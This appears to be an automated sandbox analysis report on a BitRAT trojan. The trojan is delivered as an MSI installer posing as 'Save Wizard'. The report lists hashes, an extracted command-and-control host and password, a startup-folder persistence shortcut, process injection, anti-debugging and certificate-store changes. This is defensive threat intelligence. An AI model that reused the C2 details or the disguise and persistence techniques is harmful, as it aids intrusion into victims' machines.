bitrat | 8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e

Analysis

max time kernel
4265097s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
16-01-2022 19:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi
Size

2.1MB
MD5

2db9ee63581f0297d8ca118850685602
SHA1

244c7008be6f767f0f31a341fe0e70fa2e9a5399
SHA256

8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e
SHA512

58cf0bdfe777ffcb01f9795d859f2daa9cb77d7587d1f054d8f5a0d456289d36e3c155fa6d6f5f4d47ef742a7038c3fa98b27093d6394e5db31cb5854ff5c8ff

Score

10^/10

bitrat trojan

Malware Config

Extracted

Family

bitrat

Version

1.38

idegasbre.ddns.net:1312

Attributes

communication_password
61bf8edd6e339f90f18f7860fe4c0939
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

69 3708 powershell.exe
71 3708 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

aipackagechainer.exePS4SAVEWIZARD.exeAutoIt3.exeAutoIt3.exe

pid process

3756 aipackagechainer.exe
2796 PS4SAVEWIZARD.exe
3288 AutoIt3.exe
372 AutoIt3.exe

flow	pid	process
69	3708	powershell.exe
71	3708	powershell.exe

pid	process
3756	aipackagechainer.exe
2796	PS4SAVEWIZARD.exe
3288	AutoIt3.exe
372	AutoIt3.exe

Drops startup file 1 IoCs

Processes:

PS4SAVEWIZARD.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start ChromeUpdate.lnk	PS4SAVEWIZARD.exe

Loads dropped DLL 6 IoCs

Processes:

MsiExec.exe

pid process

2808 MsiExec.exe
2808 MsiExec.exe
2808 MsiExec.exe
2808 MsiExec.exe
2808 MsiExec.exe
2808 MsiExec.exe

pid	process
2808	MsiExec.exe
2808	MsiExec.exe
2808	MsiExec.exe
2808	MsiExec.exe
2808	MsiExec.exe
2808	MsiExec.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

msiexec.exemsiexec.exe

description	ioc	process
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EB35376744F392396307460D546222D_DD2D9EEABEF3F0DB36412FEE753FD2DC	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EB35376744F392396307460D546222D_DD2D9EEABEF3F0DB36412FEE753FD2DC	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\378B079587A9184B2E2AB859CB263F40_524AD1B9B08D3C6450727265AE77B7D2	powershell.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

AutoIt3.exe

pid process

372 AutoIt3.exe
372 AutoIt3.exe
372 AutoIt3.exe
372 AutoIt3.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

AutoIt3.exe

description pid process target process

PID 3288 set thread context of 372 3288 AutoIt3.exe AutoIt3.exe

pid	process
372	AutoIt3.exe
372	AutoIt3.exe
372	AutoIt3.exe
372	AutoIt3.exe

description	pid	process	target process
PID 3288 set thread context of 372	3288	AutoIt3.exe	AutoIt3.exe

Drops file in Windows directory 15 IoCs

Processes:

msiexec.exe

description	ioc	process
File opened for modification	C:\Windows\Installer\MSI44C7.tmp	msiexec.exe
File created	C:\Windows\Installer\f773c64.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4204.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\f773c64.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI40CA.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{01D55571-EEE7-45C5-A31E-62D9383D817C}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI3D7D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4186.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI42A2.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI43BC.tmp	msiexec.exe
File created	C:\Windows\Installer\f773c67.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI4593.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vssvc.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000002b5b8d01cc3769600000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800002b5b8d010000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff0000000007000100006809002b5b8d01000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002b5b8d0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000002b5b8d0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

MusNotification.exe

description	ioc	process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	MusNotification.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	MusNotification.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

msiexec.exepowershell.exepowershell.exePS4SAVEWIZARD.exeAutoIt3.exeaipackagechainer.exe

description	ioc	process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)"	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\1F	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update"	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	AutoIt3.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave"	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20\52C64B7E	PS4SAVEWIZARD.exe
Key deleted	\REGISTRY\USER\.DEFAULT\InterbootContext	aipackagechainer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPublisher	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	PS4SAVEWIZARD.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	aipackagechainer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPublisher	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\20\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent"	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	PS4SAVEWIZARD.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	PS4SAVEWIZARD.exe

Modifies registry class 21 IoCs

Processes:

msiexec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\Assignment = "1"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\InstanceType = "0"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\AuthorizedLUAApp = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\D7B084756CD834E48B50B91634685181	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\17555D107EEE5C543AE1269D83D318C7	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\17555D107EEE5C543AE1269D83D318C7\PS4SAVEWIZARD	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\ProductName = "Save Wizard"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\D7B084756CD834E48B50B91634685181\17555D107EEE5C543AE1269D83D318C7	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\SourceList\PackageName = "8c6cf25734d89865f9aaa5dea926d6dcb66558ac0493248237c36474b1d3bd0e.msi"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\Version = "16777216"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\17555D107EEE5C543AE1269D83D318C7\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\PackageCode = "7809ABB7D7D8ED0409C7782B3B02FB7A"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\17555D107EEE5C543AE1269D83D318C7\Language = "1033"	msiexec.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

PS4SAVEWIZARD.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	PS4SAVEWIZARD.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	PS4SAVEWIZARD.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	PS4SAVEWIZARD.exe
